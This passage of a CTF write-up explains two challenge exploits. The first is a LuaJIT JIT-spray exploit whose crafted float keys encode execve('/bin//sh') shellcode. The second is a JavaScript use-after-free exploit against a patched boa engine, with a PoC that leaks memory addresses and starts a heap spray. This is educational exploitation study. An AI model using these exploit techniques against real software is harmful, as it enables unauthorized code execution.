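The Lua function cargo requires its two arguments to be a function and an integer. From the code, when Lua calls cargo, the C side looks up the JIT trace structure of the Lua function passed in and shifts the start of the machine code that will run for it. The modified fields GCtrace::mcode and GCtrace::szmcode are the start address and the size of the compiled machine code: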

/* Trace object. */
typedef struct GCtrace {
  ...
  MSize szmcode;  /* Size of machine code. */
  MCode *mcode;   /* Start of machine code. */
  ...
} GCtrace;

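So if we can use immediates to craft the JIT-compiled machine code and then move the start of the JIT code, control flow will decode our prepared immediates as instructions, and the shellcode runs.

This technique is also known as JIT spraying.

Note that cove applies some JIT configuration: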

void set_jit_settings(lua_State* L) {
    luaL_dostring(L,
        "jit.opt.start('3');"
        "jit.opt.start('hotloop=1');"
    );
}

Both lines of Lua call jit.opt.start(), which is implemented at LuaJIT/src/lib_jit.c:512:

/* jit.opt.start(flags...) */
LJLIB_CF(jit_opt_start)
{
  jit_State *J = L2J(L);
  int nargs = (int)(L->top - L->base);
  if (nargs == 0) {
    J->flags = (J->flags & ~JIT_F_OPT_MASK) | JIT_F_OPT_DEFAULT;
  } else {
    int i;
    for (i = 1; i <= nargs; i++) {
      const char *str = strdata(lj_lib_checkstr(L, i));
      if (!jitopt_level(J, str) &&
    !jitopt_flag(J, str) &&
    !jitopt_param(J, str))
  lj_err_callerv(L, LJ_ERR_JITOPT, str);
    }
  }
  return 0;
}

The two jit.opt.start calls set:

jit.opt.start('3'): goes into jitopt_level and sets the optimization level to 3 (the highest)

/* Optimization levels set a fixed combination of flags. */
#define JIT_F_OPT_0 0
#define JIT_F_OPT_1 (JIT_F_OPT_FOLD|JIT_F_OPT_CSE|JIT_F_OPT_DCE)
#define JIT_F_OPT_2 (JIT_F_OPT_1|JIT_F_OPT_NARROW|JIT_F_OPT_LOOP)
#define JIT_F_OPT_3 (JIT_F_OPT_2|\
  JIT_F_OPT_FWD|JIT_F_OPT_DSE|JIT_F_OPT_ABC|JIT_F_OPT_SINK|JIT_F_OPT_FUSE)
#define JIT_F_OPT_DEFAULT JIT_F_OPT_3

/* Parse optimization level. */
static int jitopt_level(jit_State *J, const char *str)
{
  if (str[0] >= '0' && str[0] <= '9' && str[1] == '\0') {
    uint32_t flags;
    if (str[0] == '0') flags = JIT_F_OPT_0;
    else if (str[0] == '1') flags = JIT_F_OPT_1;
    else if (str[0] == '2') flags = JIT_F_OPT_2;
    // Here!
    else flags = JIT_F_OPT_3;
    J->flags = (J->flags & ~JIT_F_OPT_MASK) | flags;
    return 1;  /* Ok. */
  }
  return 0;  /* No match. */
}

jit.opt.start('hotloop=1'): initializes the hotcount table.

/* Parse optimization parameter. */
static int jitopt_param(jit_State *J, const char *str)
{
  const char *lst = JIT_P_STRING;
  int i;
  for (i = 0; i < JIT_P__MAX; i++) {
    size_t len = *(const uint8_t *)lst;
    lua_assert(len != 0);
    if (strncmp(str, lst+1, len) == 0 && str[len] == '=') {
      int32_t n = 0;
      const char *p = &str[len+1];
      while (*p >= '0' && *p <= '9')
  n = n*10 + (*p++ - '0');
      if (*p) return 0;  /* Malformed number. */
      // 1. Control flow reaches here and stores the parameter
      J->param[i] = n;
      // 2. Check whether the parameter is hotloop
      if (i == JIT_P_hotloop)
        // 3. Call this function to do the initialization
        lj_dispatch_init_hotcount(J2G(J));
      return 1;  /* Ok. */
    }
    lst += 1+len;
  }
  return 0;  /* No match. */
}

#if LJ_HASJIT
/* Initialize hotcount table. */
void lj_dispatch_init_hotcount(global_State *g)
{
  int32_t hotloop = G2J(g)->param[JIT_P_hotloop];
  HotCount start = (HotCount)(hotloop*HOTCOUNT_LOOP - 1);
  HotCount *hotcount = G2GG(g)->hotcount;
  uint32_t i;
  for (i = 0; i < HOTCOUNT_SIZE; i++)
    hotcount[i] = start;
}
#endif

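The following two links help in understanding hotcount:

In short, hotcount is a hash table that LuaJIT uses to track specific control-transfer instructions (calls, jumps and so on); it stores how hot each tracked instruction is. LuaJIT is a tracing JIT rather than a method JIT, which means it optimizes per path instead of per function or method. Because it traces paths, it naturally pays more attention to control-transfer instructions, hence the hotcount table.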
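
To see what hotloop=1 means for function calls, the countdown can be replayed in a few lines of C. This is a sketch under assumptions: as far as I recall, lj_dispatch.h defines HOTCOUNT_LOOP as 2 and HOTCOUNT_CALL as 1 and HotCount is a 16-bit counter, and the interpreter treats a borrow on the subtraction as "hot"; the TOY_ names and toy_calls_until_hot are made up, and hash collisions between bytecode addresses are ignored.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_HOTCOUNT_LOOP 2   /* assumed value of HOTCOUNT_LOOP */
#define TOY_HOTCOUNT_CALL 1   /* assumed value of HOTCOUNT_CALL */

typedef uint16_t toy_hotcount;

/* Same formula as lj_dispatch_init_hotcount() in the listing above. */
toy_hotcount toy_hotcount_start(int32_t hotloop) {
    return (toy_hotcount)(hotloop * TOY_HOTCOUNT_LOOP - 1);
}

/* Number of calls to one function until its counter underflows, which is
 * the moment the interpreter would start recording a trace. */
unsigned toy_calls_until_hot(int32_t hotloop) {
    toy_hotcount counter = toy_hotcount_start(hotloop);
    unsigned calls = 0;
    for (;;) {
        calls++;
        if (counter < TOY_HOTCOUNT_CALL)   /* subtraction would borrow */
            return calls;
        counter = (toy_hotcount)(counter - TOY_HOTCOUNT_CALL);
    }
}
```

Under these assumptions hotloop=1 gives a start value of 1, so the second call of a function already triggers compilation, while the default hotloop of 56 would need 112 calls.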

cove's JIT configuration does not affect our exploit much, though; this was only a short digression.

IV. Exploitation

Debugging basics:
To run the program, execute LD_LIBRARY_PATH=. ./cove exp.lua directly.
To debug it, start a gdb session with gdb --args ./cove exp.lua and then run set env LD_LIBRARY_PATH . inside gdb.

Start with a throwaway function to try LuaJIT out:

function func() 
    local arr = {1, 2, 3, 4, 5, 6}
end

print(func)
-- cargo(func, 0)

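This triggers a SIGSEGV. Debugging shows that the print function implemented in cove dereferences a null pointer: lua_tostring returns NULL for a value that is neither a string nor a number, such as a function, and puts is then called on it. Patch it as follows: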

 int print(lua_State* L) {
     if (lua_gettop(L) < 1) {
         return luaL_error(L, "expecting at least 1 arguments");
     }
     const char* s = lua_tostring(L, 1);
-    puts(s);
+    puts(s ? s : "(nil)");
     return 0;
 }

After rebuilding, the SIGSEGV is gone.

Add two call sites and func gets JIT-compiled:

function func() 
    local arr = {1, 2, 3, 4, 5, 6}
end

func()
func()
cargo(func, 0)
-- Output: INSPECTION: This ship's JIT cargo was found to be 0x800021feffdc

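GDB confirms that the generated machine instructions are stored at that address, which lies in an rx segment:

Set a breakpoint on the JIT-generated instructions and the next call to func hits it (note that the figure below does not correspond to the one above). If the second argument of cargo, offset, is changed, the next execution of the JIT-compiled function really does start offset bytes further in:

We now know how to trigger JIT compilation of a function and roughly what the generated machine code looks like. The next step is to plant chosen immediates in the JIT machine code. One thing to note: Lua has a single Number type with no distinction between integers and floats, and LuaJIT represents Lua Numbers internally as floating-point values. The following Lua code confirms this: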

-- A large number
num1 = 0x112233445566
print(num1)        -- prints 18838586676582
num1 = num1 + 0.5
-- precision is lost on output
print(num1)        -- prints 18838586676583

-- A very large number, printed in floating-point notation
num1 = 0x1122334455667788
print(num1)        -- prints 1.2346056164365e+18
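
The same behaviour can be checked from C, since a Lua Number here is an IEEE 754 double with a 53-bit significand. The helper names below are made up for this sketch; it only shows which integers survive a round trip through double.

```c
#include <assert.h>
#include <stdint.h>

/* Round-trip an integer through double, as storing it in a Lua Number does. */
uint64_t through_double(uint64_t value) {
    return (uint64_t)(double)value;
}

/* 1 if the integer is exactly representable as a double, 0 otherwise. */
int survives_double(uint64_t value) {
    return through_double(value) == value;
}
```

0x112233445566 needs fewer than 53 bits and survives unchanged, whereas the 61-bit 0x1122334455667788 loses its low 8 bits to rounding and comes back as 0x1122334455667800. This matters later: only 64-bit patterns that are valid doubles can be planted exactly.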

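Now let's try to place chosen values in the JIT code. LuaJIT enables many optimizations, dead code elimination among them, so an array object created inside the function must be used at least once or it is simply removed. print turned out to be too awkward for this, so I used another way to keep the code from being optimized away.

The test Lua code: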

function func(arr) 
    arr[0] = 1.0;
    arr[1] = 2.0;
    arr[2] = 3.0;
    arr[3] = 4.0;
    arr[4] = 5.0;
    arr[5] = 6.0;
end

arr = {1, 2, 3, 4, 5}
func(arr)
func(arr)
cargo(func, 0)
func(arr)

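The compiled code does not meet our needs: LuaJIT stores the numbers on the right-hand side of the assignments in a separate memory location and loads them when needed:

However the right-hand side is changed, it still gets loaded from elsewhere, so we can try changing the key on the left instead, that is, the xxx in arr[xxx] = _.

After some experimenting, the results by key type are:

Characters or strings: the JIT code contains many immediates, but they are not controllable.
Consecutive integer-valued floats such as 1.0, 2.0, 3.0: the generated JIT code is the same as before.

Non-consecutive floats: the generated code is exactly what we need. Take the following Lua code: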

function func(arr) 
    arr[1.0] = 1;
    arr[5.0] = 2;
    arr[21.0] = 3;
    arr[244.0] = 4;
    arr[21.0] = 5;
    arr[422.0] = 6;
end

arr = {1, 2, 3, 4, 5}
func(arr)
func(arr)
cargo(func, 0)
func(arr)

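The generated JIT code:

This gives us a way to place chosen data in the JIT code. What remains is writing the shellcode and laying it out there, which is just grunt work.

A handy tool here is an online float-to-binary converter, which makes converting between floats and their bit patterns easy.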
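
The conversion can also be done locally. Below is a minimal sketch, assuming a platform where double is the 64-bit IEEE 754 type; pack_le, bits_to_double and double_to_bits are names made up for this illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

_Static_assert(sizeof(double) == sizeof(uint64_t), "double must be 64 bits");

/* Pack 8 bytes, in the order they should appear in memory, into one
 * little-endian 64-bit value. */
uint64_t pack_le(const uint8_t bytes[8]) {
    uint64_t bits = 0;
    for (int i = 7; i >= 0; i--)
        bits = (bits << 8) | bytes[i];
    return bits;
}

/* Reinterpret a 64-bit pattern as a double (memcpy avoids aliasing issues). */
double bits_to_double(uint64_t bits) {
    double d;
    memcpy(&d, &bits, sizeof d);
    return d;
}

/* Reinterpret a double as its 64-bit pattern. */
uint64_t double_to_bits(double d) {
    uint64_t bits;
    memcpy(&bits, &d, sizeof bits);
    return bits;
}
```

Printing bits_to_double(...) with printf("%.17g") yields a decimal literal that converts back to the same bits. Patterns whose exponent bits are all ones are NaN or infinity and may not survive as-is, so the byte layout has to avoid them.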

My exploit is shown below (note that this exp has a tiny, that is to say huge, problem):

function f(a) 
    a[1.2015822066494834e-135] = 1; -- 4831f6 4889f2 ebxx  0x(23ebf28948f63148)
    a[1.888017891495551e-193] = 2; -- 4889f1 56 9090 ebxx 0x(17eb909056f18948)
    a[1.8732669152797884e-193] = 3; -- 682f62696e 59 ebxx 0x(17eb596e69622f68)
    a[1.8748660135882913e-193] = 4; -- 682f2f7368 5f ebxx 0x(17eb5f68732f2f68)
    a[1.8880176708811596e-193] = 5; -- 48c1e720 9090 ebxx 0x(17eb909020e7c148)
    a[2.383013609192317e-222] = 6; -- 4809cf 57 9090 ebxx 0x(11eb909057cf0948)
    a[1.872946064693589e-193] = 7; -- 4889e7 6a3b 58 ebxx 0x(17eb583b6ae78948)
    a[1.8880178917328522e-193] = 8; -- 99 6a00 57 9090 ebxx 0x(17eb909057006a99)
    a[-2.4120921044623575e+255] = 9; -- 4889e6 0f05 90 f4f4 0x(f4f490050fe68948)
end

a = {1, 2, 3, 4, 5}
f(a)
f(a)
cargo(f, 0x80)
f(a)

The shellcode that actually executes is:

4831f6        xor rsi, rsi
4889f2        mov rdx, rsi
4889f1        mov rcx, rsi

56            push rsi
682f62696e    push 0x6e69622f
59            pop rcx
682f2f7368    push 0x68732f2f
5f            pop rdi
48c1e720      shl rdi, 32
4809cf        or rdi, rcx
57            push rdi
4889e7        mov rdi, rsp

6a3b          push 0x3b
58            pop rax
99            cdq

6a00          push 0
57            push rdi
4889e6        mov rsi, rsp

0f05          syscall

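Note: the opcode for jmp rel8 is eb.

At this point execution is about to reach SYS_execve("/bin//sh", ["/bin//sh", NULL], NULL) (mcode + 0x181):

Oddly, though, sh exited immediately:

So I wrote a small program by hand to try to reproduce it: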

#include <stdlib.h>
#include <unistd.h>

int main() {
    char* path = "/bin//sh";
    char* argv[] = { path, NULL };
    execve(path, argv, NULL);
    abort();
}

But the problem did not reproduce:

Even running the shellcode directly:

#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char* shellcode = "\x48\x31\xf6\x48\x89\xf2\x48\x89\xf1\x56\x68\x2f\x62"
                  "\x69\x6e\x59\x68\x2f\x2f\x73\x68\x5f\x48\xc1\xe7\x20\x48"
                  "\x09\xcf\x57\x48\x89\xe7\x6a\x3b\x58\x99\x6a\x00\x57\x48\x89\xe6\x0f\x05";

int main() {
    // char* path = "/bin//sh";
    // char* argv[] = { path, NULL };
    // execve(path, argv, NULL);
    
    char buffer[50];
    memcpy(buffer, shellcode, 50);
    void (*scfunc)() = buffer;
    scfunc();
    abort();
}

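also fails to reproduce /bin/sh exiting immediately:

I was stumped. So I used gdb's catch exec command to follow into the exec'ed dash process and debug it, and finally found that the cause was simply that stdin had been closed (facepalm):

In hindsight, the cove source code had made this clear all along; I had just overlooked it: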

void run_code(lua_State* L, char* path) {
    const size_t max_size = MAX_SIZE;
    char* code = calloc(max_size+1, 1);

    FILE* f = fopen(path,"r");
    ...
    fseek(f, 0, SEEK_END);
    size_t size = ftell(f);
    ...
    fseek(f, 0, SEEK_SET);
    fread(code, 1, size, f);

    // Here! stdin is closed
    fclose(stdin);

    int ret = luaL_dostring(L, code);
    if (ret != 0) {
        printf("Lua error: %s\n", lua_tostring(L, -1));
    }
}

Well, all I can say is that I did not look closely enough and walked right into it.

That wraps up the review of this challenge!

Defcon-30-Quals rust-pwn constricted: Review Notes

2022-08-26T16:00:00.000Z

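I. Introduction

These are my notes from revisiting the constricted challenge from Defcon 30 Quals.

The challenge provides a git diff against the boa project and asks you to exploit boa with the diff applied. boa is a JavaScript engine written in Rust, so pwning it means writing the exploit in JS.

When I first attempted this challenge I had never touched Rust; this time, ~~having returned from my studies~~, I can take a proper look.

The point of the challenge is to show that even programs written in Rust can still contain vulnerabilities.

Note that all debugging here was done on a real machine rather than in the docker environment, so the exp may not be portable.

II. The diff

The diff can be summarized roughly as follows:

At startup, the program mmaps a region of random length. The ctor attribute means this init function runs before main: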

use libc::{getrandom, mmap, MAP_PRIVATE, MAP_ANON};
use std::ptr;
use ctor::*;

#[ctor]
unsafe fn init() {
    let mut buf = [0u8; 4];
    getrandom(buf.as_mut_ptr() as *mut libc::c_void, 4, 0);
    let off = std::mem::transmute::<[u8; 4], u32>(buf).to_le() as usize;
    let off = off << 12;
    let length = 0x80000000 + off;
    mmap(ptr::null_mut(), length, 0, MAP_PRIVATE | MAP_ANON, -1, 0);
}

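It introduces a new JSObject type, TimedCache:

>> let v = new TimedCache()
undefined
>> v
TimedCache()

The TimedCache class lives in boa_engine/src/builtins/timed_cache/mod.rs and has three methods: get, set, and has. All three are time-related, and together they behave like a timer: set installs a timer (an entry with a lifetime), get fetches the entry for a key while its timer has not expired and can optionally refresh the lifetime, and has checks whether a timer has expired.

Several extra methods are implemented on the console class:

1. console.sysbreak(): triggers an int3 trap.
  >> console.sysbreak()
  [1] 155238 trace trap (core dumped) target/debug/boa
2. console.sleep(ms): pauses the thread for the given number of milliseconds.
  >> console.sleep(1000) // sleep 1s
  undefined
3. console.collectGarbage(): forces a garbage collection. The collector involved is the one in the gc = "0.4.1" crate, i.e. rust-gc.
4. console.debug is enhanced to print more useful information.

In the boa_engine/src/object/internal_methods/ directory, more than half of the classes are modified so that each static internal method object is allocated on the heap instead of in the data segment.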

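III. Locating the vulnerability

From the summary above, the diff:

Provides time-related methods and classes such as console.sleep and TimedCache.
Goes out of its way to move static objects onto the heap (they were perfectly fine in the data segment).
Deliberately exposes console.collectGarbage, an interface for forcing rust-gc to collect.

So this challenge is clearly a fight with rust-gc. One might ask: doesn't Rust do without a GC? It does, but managing memory purely with Arc and Rc can lead to nasty situations such as reference cycles, and it makes development harder. The rust-gc crate exists to balance memory safety against development effort.

rust-gc is a mark-sweep collector: only marked objects survive, and unmarked objects are destroyed during collection. Details are in the rust-gc GitHub repository; be sure to read it first to get a rough idea of how rust-gc is used.

When summarizing the diff I left out the implementation details of TimedCache, and that is where the key lies. In boa_engine/src/builtins/timed_cache/mod.rs, the TimeCachedValue type uses boa_gc (a wrapper around rust-gc) to manage its instances: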

#[derive(Debug, Clone)]
pub struct TimeCachedValue {
    expire: u128,
    data: JsObject,
}
...
impl Finalize for TimeCachedValue {}
unsafe impl Trace for TimeCachedValue {
    custom_trace!(this, {
        if !this.is_expired() {
            mark(&this.data);
        } 
    });
}

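Once the timer stored in a TimeCachedValue expires, the data field of that instance is no longer marked, which means that at some point after expiry the memory backing data will be freed. Note that JsObject, the type of data, is itself a GC type: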

pub struct JsObject {
    inner: Gc<boa_gc::Cell<Object>>,
}

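Keep in mind, however, that Gc<_> is only a pointer type to a Gc::Cell. In other words, although the Cell that Gc<_> points to has been freed, the Gc<_> itself is still inside the TimeCachedValue. If we can smuggle that Gc<_> pointer out after the Gc::Cell is freed, we get a UAF.

In the whole TimedCache implementation only one place looks suspicious, the get function: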

if let JsValue::Object(ref object) = this {
    // 1. check expire
    if !check_is_not_expired(object, key, context)? {
        return Ok(JsValue::undefined());
    }

    let new_lifetime = args.get_or_undefined(1);
    let expire = if !new_lifetime.is_undefined() && !new_lifetime.is_null() {
        // 2. calc new expire. Is it possible to collect `data`?
        Some(calculate_expire(new_lifetime, context)?)
    } else {
        None
    };

    if let Some(cache) = object.borrow_mut().as_timed_cache_mut() {
        if let Some(cached_val) = cache.get_mut(key) {
            if let Some(expire) = expire {
                cached_val.expire = expire as u128;
            }
            // 3. Maybe return freed reference of `data`
            return Ok(JsValue::Object(cached_val.data.clone()));
        }
        return Ok(JsValue::undefined());
    }
}

calculate_expire calls to_integer_or_infinity on the lifetime argument it receives:

fn calculate_expire(lifetime: &JsValue, context: &mut Context) -> JsResult<i128> {
    let lifetime = lifetime.to_integer_or_infinity(context)?;
    ...
}

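If the lifetime passed in is a carefully crafted object, then when boa calls calculate_expire it runs that object's hook function, and inside the hook we can sleep and then trigger a GC. TimedCache::get can then return a GC reference that has already been freed, triggering the UAF.

From there, exploitation proceeds with heap spraying plus the UAF.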
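
The check-then-use gap can be illustrated in plain JavaScript without any boa-specific API. This is only a sketch: FakeCache is a hypothetical stand-in for TimedCache, and its alive flag plays the role of "not yet freed by the GC".

```javascript
// Illustration of a check / user callback / use sequence.
// FakeCache is hypothetical; expireAll() stands in for "sleep, then force a GC".

class FakeCache {
  constructor() { this.entry = null; }
  set(value) { this.entry = { value, alive: true }; }
  expireAll() { if (this.entry) this.entry.alive = false; }
  get(newLifetime) {
    if (!this.entry || !this.entry.alive) return undefined; // 1. check
    const lifetime = Math.trunc(Number(newLifetime));       // 2. coercion runs user code
    void lifetime;                                          //    (the value itself is irrelevant here)
    return this.entry;                                      // 3. use, without checking again
  }
}

const cache = new FakeCache();
cache.set("payload");

// Number(obj) invokes obj.valueOf(), so the callback runs in the middle of get().
const evil = { valueOf() { cache.expireAll(); return 0; } };
const stale = cache.get(evil);

console.log(stale.alive); // false: get() returned an entry invalidated during the call
```

In the real target the invalidated entry is freed memory rather than a flag, which is what turns this ordering mistake into a use-after-free.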

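IV. A brief look at rust-gc

While working on the challenge I also looked into the rust-gc library to see whether a multi-threaded race was possible. Debugging showed that the whole boa process has only a single main thread. boa triggers a mark & sweep collection on its own only once the total size of allocated objects exceeds a threshold, and the initial threshold is 100 bytes per thread: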

// /root/.cargo/registry/src/mirrors.tuna.tsinghua.edu.cn-df7c3c540f42cdbd/gc-0.4.1/src/gc.rs
impl<T: Trace> GcBox<T> {
    /// Allocates a garbage collected `GcBox` on the heap,
    /// and appends it to the thread-local `GcBox` chain.
    ///
    /// A `GcBox` allocated this way starts its life rooted.
    pub(crate) fn new(value: T) -> NonNull<Self> {
        GC_STATE.with(|st| {
            let mut st = st.borrow_mut();

            // XXX We should probably be more clever about collecting
            if st.bytes_allocated > st.threshold {
                // HERE! 
                collect_garbage(&mut *st);
                ...
            }
            ...

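rust-gc is not a long library, and taking the time to understand its implementation helps enormously with the challenge.

Every GC object has a GC header that records extra attributes of the object, such as the mark flag and next, a reference to the next object on the GC chain: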

let gcbox = Box::into_raw(Box::new(GcBox {
    header: GcBoxHeader {
        roots: Cell::new(1),
        marked: Cell::new(false),
        next: st.boxes_start.take(),
    },
    data: value,
}));

When the application calls Gc::new to create a heap object, that function in turn creates it through the GcBox shown above:

impl<T: Trace> Gc<T> {
    /// Constructs a new `Gc` with the given value.
    ///
    /// # Collection
    ///
    /// This method could trigger a garbage collection.
    ///
    /// # Examples
    ///
    /// 
    /// use gc::Gc;
    ///
    /// let five = Gc::new(5);
    /// assert_eq!(*five, 5);
    /// 
    pub fn new(value: T) -> Self {
        assert!(mem::align_of::<GcBox<T>>() > 1);

        unsafe {
            // Allocate the memory for the object
            let ptr = GcBox::new(value);

            // When we create a Gc, all pointers which have been moved to the
            // heap no longer need to be rooted, so we unroot them.
            (*ptr.as_ptr()).value().unroot();
            let gc = Gc {
                ptr_root: Cell::new(NonNull::new_unchecked(ptr.as_ptr())),
                marker: PhantomData,
            };
            gc.set_root();
            gc
        }
    }
}

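The Gc<_> struct only holds a pointer to a GcBox<_>, and it is only the allocation and freeing of GcBox<_> that is actually managed by the mark & sweep GC.

When a collection enters its mark phase, the GC walks the GcBox<_> chain it maintains, marks the rooted elements, and recursively marks the fields they contain. Each GcBox header has a roots field (in practice 0 or 1 here) that records whether the box is currently rooted, i.e. referenced directly from outside the GC heap. A GcBox that is only a field of another GcBox has roots equal to 0. What the GC reclaims are exactly the GcBoxes that are neither rooted nor marked.

A GcBox whose Gc handle has been moved inside another GC-managed object is no longer rooted, but the GC can still reach it by starting from the topmost GC holders in boa and tracing downward recursively, marking each GcBox<_> along the way. The whole flow is self-consistent and sound. The reason this challenge has a bug is that boa's custom_trace implementation for TimeCachedValue is wrong: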

unsafe impl Trace for TimeCachedValue {
    custom_trace!(this, {
        // externally mutable condition
        if !this.is_expired() {
            mark(&this.data);
        } 
    });
}

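Bringing an externally mutable condition into trace makes it possible for a Gc variable to still be on the object tree as a whole while the data it points to has already been freed.

The externally mutable condition here is time.
Put differently, this trace implementation breaks a rule: a value must not be freed while its ownership has not changed in any way.

Here is an example of custom_trace used correctly: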

unsafe impl Trace for OrderedMap {
    custom_trace!(this, {
        for (k, v) in this.map.iter() {
            if let MapKey::Key(key) = k {
                mark(key);
            }
            mark(v);
        }
    });
}

This implementation dutifully propagates trace into every child field and introduces no externally mutable condition.
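
To make the consequence of a conditional trace concrete, here is a toy mark-and-sweep heap in JavaScript. It is a sketch under simplifying assumptions, not a model of rust-gc internals; ToyHeap, alloc, and collect are hypothetical names.

```javascript
// Toy mark-and-sweep heap: objects are kept in a Map keyed by id.
class ToyHeap {
  constructor() { this.objects = new Map(); this.nextId = 1; }
  alloc(fields, trace) {
    const id = this.nextId++;
    // `trace` returns the ids of the children that should be kept alive.
    this.objects.set(id, { fields, trace, marked: false });
    return id;
  }
  mark(id) {
    const obj = this.objects.get(id);
    if (!obj || obj.marked) return;
    obj.marked = true;
    for (const child of obj.trace(obj.fields)) this.mark(child);
  }
  collect(roots) {
    roots.forEach((r) => this.mark(r));
    for (const [id, obj] of this.objects) {
      if (obj.marked) obj.marked = false; // survivor: reset for the next cycle
      else this.objects.delete(id);       // unreachable: "free" it
    }
  }
}

const heap = new ToyHeap();
let expired = false; // external, mutable condition (time, in the challenge)

const data = heap.alloc({}, () => []);
// Buggy trace: only reports `data` while the entry has not expired.
const entry = heap.alloc({ data }, (f) => (expired ? [] : [f.data]));

heap.collect([entry]);
const aliveBefore = heap.objects.has(data);

expired = true;
heap.collect([entry]);
const aliveAfter = heap.objects.has(data);
const stillReferenced = heap.objects.get(entry).fields.data === data;

console.log(aliveBefore, aliveAfter, stillReferenced);
```

After the second collection the entry still stores the id of data even though data is gone from the heap, which is the dangling reference that the exploit later pulls out through get.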

V. Exploitation

a. UAF

While testing I accidentally triggered a panic with the following code:

tc = new TimedCache()
tc.set('k', {}, 0) // lifetime = 0 makes the timer expire immediately, so the JsObject is no longer marked
[press ctrl+D to send EOF; garbage collection starts] // panic!

A slightly reworked version that triggers reliably:

tc = new TimedCache()
tc.set('k', {}, 0)
tc = null
console.collectGarbage() // panic!

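The stack trace is long, but it is clearly GC-related. Reading the code, this panic exists to stop a Gc<_> from dereferencing the GcBox<_> pointer it holds during the sweep phase, since doing so would lead to unexpected behavior and is unsafe.

The code hits this panic because of the UAF. The GcBox holding the JS object {} should have root=0, so normally the unsafe block is never entered. But because the memory has been freed, the bytes where the root field lives have changed, self.rooted() returns true, execution enters the unsafe block, and the check fires and panics: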

impl<T: Trace + ?Sized> Drop for Gc<T> {
    #[inline]
    fn drop(&mut self) {
        // If this pointer was a root, we should unroot it.
        if self.rooted() {
            // this branch should not be taken
            unsafe {
                self.inner().unroot_inner();
            }
        }
    }
}

With everything learned so far, here is a first attempt at a PoC:

// console wrapper
let log = (x) => { console.log(x) };
let debug = (x) => { log(console.debug(x)) };
let gc = () => console.collectGarbage();
let sleep = (x) => console.sleep(x);

let fake_timeout = { valueOf() {
    log("[+] fake_timeout called");
    sleep(2000);
    gc();
    return 0; 
}};

let cache = new TimedCache();
cache.set('key', new ArrayBuffer(1024), 1000);
let uaf_obj = cache.get("key", fake_timeout);
debug(uaf_obj);

The final debug call prints a JSObject, as expected:

JsValue @0x75870461d090
Object @0x7587046c08a8
- Methods @0x758704609310
- Array Buffer Data @0x7587046d8000

b. leak heap

Next, how do we leak useful addresses? We can try dumping the contents of the freed chunk:

// tools wrapper
let log = (x) => { console.log(x) };
let debug = (x) => { log(console.debug(x)) };
let gc = () => console.collectGarbage();
let bp = () => console.sysbreak();
let sleep = (x) => console.sleep(x);
let hex = (x) => ("0x" + x.toString(16));

// parse
// let get_js_value = (obj) => 
//     Number.parseInt(console.debug(obj).split("JsValue @")[1].split("\n")[0]);
let get_obj_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Object @")[1].split("\n")[0]);
let get_method_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Methods @")[1].split("\n")[0]);
let get_buffer_data_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Buffer Data @")[1].split("\n")[0]);

let spray_obj = [];

let fake_timeout = { valueOf() {
    log("[+] fake_timeout called");
    sleep(2000);
    gc();

    return 0; 
}};

let cache = new TimedCache();
cache.set('key', new Uint32Array(20), 1000);
let uaf_obj = cache.get("key", fake_timeout);

debug(uaf_obj);
log(uaf_obj.length)
for (let i = 0; i < uaf_obj.length; ++i) {
    log(i + " => " + uaf_obj[i]);
}
bp();

Output:

[+] fake_timeout called
JsValue @0x72d3b041d090
Object @0x72d3b04e7c28
- Methods @0x72d3b0409460

20
0 => 0
1 => 0
2 => 2957263088
3 => 29395
4 => 152870256
5 => 0
6 => 0
7 => 0
8 => 0
9 => 0
10 => 2957103232
11 => 29395
12 => 1
13 => 0
14 => 1
15 => 0
16 => 4282195719
17 => 32767
18 => 2957250560
19 => 29395

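The output contains two kinds of number pairs. Each pair consists of one large and one small number that combine into a valid memory address:

uaf_obj[3] * 0x100000000 + uaf_obj[2] == 0x72d3b04440f0:
This memory is managed by Rust itself. As long as the exp is unchanged, the offset of this address from the start of its mapping stays around 0x4440f0.
uaf_obj[17] * 0x100000000 + uaf_obj[16] == 0x7fffff3d1f07, at relative offset 0x1f07:

Note: the array stored in the TimedCache has length 20; if it is much longer or shorter, no meaningful pointers can be collected.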
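
The pairing of 32-bit words into pointers can be sketched as follows. The word values are copied from the output above; joinWords and findPointers are hypothetical helper names, and the 0x7000..0x7fff window for the high half is an assumption that happens to match this particular run.

```javascript
// Rebuild 64-bit pointers from pairs of 32-bit words read out of a Uint32Array.
// BigInt is used so that no bits are lost.

function joinWords(low, high) {
  return (BigInt(high) << 32n) | BigInt(low);
}

// Keep only the pairs whose high half looks like a user-space address prefix.
function findPointers(words) {
  const found = [];
  for (let i = 0; i + 1 < words.length; i += 2) {
    const high = words[i + 1];
    if (high >= 0x7000 && high <= 0x7fff) {
      found.push({ index: i, address: joinWords(words[i], high) });
    }
  }
  return found;
}

const dump = [0, 0, 2957263088, 29395, 152870256, 0, 0, 0, 0, 0,
              2957103232, 29395, 1, 0, 1, 0, 4282195719, 32767, 2957250560, 29395];

for (const { index, address } of findPointers(dump)) {
  console.log(index, "0x" + address.toString(16));
}
```

Subtracting the known in-mapping offset from such a pointer should give a page-aligned base; a non-zero low 12 bits is a cheap sign that the leak picked up the wrong word.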

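This gives us the base addresses of both mappings. Interestingly, the mapping sandwiched between the two is exactly the memory allocated by the mmap call that ctor runs before main, and its length changes on every restart (because of getrandom):

Note that the program was debugged many times, so addresses do not match from one figure to the next (for example, the addresses in the figure above cannot be mapped onto the one below).

Of the two mappings, the lower and larger one is the heap memory managed by Rust, which holds many of the objects Rust creates. Take care not to confuse it with the heap segment.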

c. spray

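For the spray, we want an array object's backing store to land in the hole left by the freed JsObject's Object struct. We can then overwrite the UAF JsObject's Object struct through the array and build a fake object.

In JS engine exploitation, Typed Arrays and ArrayBuffers are the usual choice for reclaiming freed memory. Because boa prints the data pointer of an ArrayBuffer, and BigUint64 lets us write memory in 8-byte units later on, we use an ArrayBuffer to occupy the memory and a BigUint64Array to interpret it.

There are a few questions to settle first. If we want to occupy the UAF object:

How do we determine the size of the UAF object?
What makes a good UAF object?

First question first. It is hard to read off the size of a struct directly from Rust code, and we also do not know how long the chunk metadata is when Rust allocates heap memory (or even whether chunks have metadata at all). But we can find out by repeatedly creating values of the same type and printing their pointers. For example: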

let spray_objs = [];
for(let i = 0; i < 10; i++) {
    let obj = new ArrayBuffer(0x100); // alloc
    debug(obj);  // output
    log("") // new line
    spray_objs.push(obj);
}

From the spacing between the Object pointers in the output:

JsValue @0x729fbc61d260
Object @0x729fbc6e8b28
